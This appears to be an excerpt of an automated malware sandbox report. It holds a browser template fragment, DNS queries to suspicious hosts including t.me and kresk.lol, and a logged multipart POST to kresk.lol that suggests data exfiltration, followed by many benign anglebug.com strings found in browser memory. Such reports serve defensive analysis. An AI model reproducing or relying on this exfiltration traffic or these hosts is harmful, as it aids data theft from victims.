html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
    Source: global trafficDNS traffic detected: DNS query: YNwKHeEoflVmSgaTq.YNwKHeEoflVmSgaTq
    Source: global trafficDNS traffic detected: DNS query: t.me
    Source: global trafficDNS traffic detected: DNS query: kresk.lol
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
    Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
    Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
    Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
    Source: global trafficDNS traffic detected: DNS query: assets.msn.com
    Source: global trafficDNS traffic detected: DNS query: c.msn.com
    Source: global trafficDNS traffic detected: DNS query: api.msn.com
    Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CJWTR1NG4OZUAAASR9HVUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: kresk.lolContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
    Source: msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
    Source: msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
    Source: msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3564876325.000027F00258C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
    Source: chrome.exe, 00000010.00000003.3417194811.00004EB400BC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3417167593.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3416284187.00004EB4003C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.3565415342.000027F002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
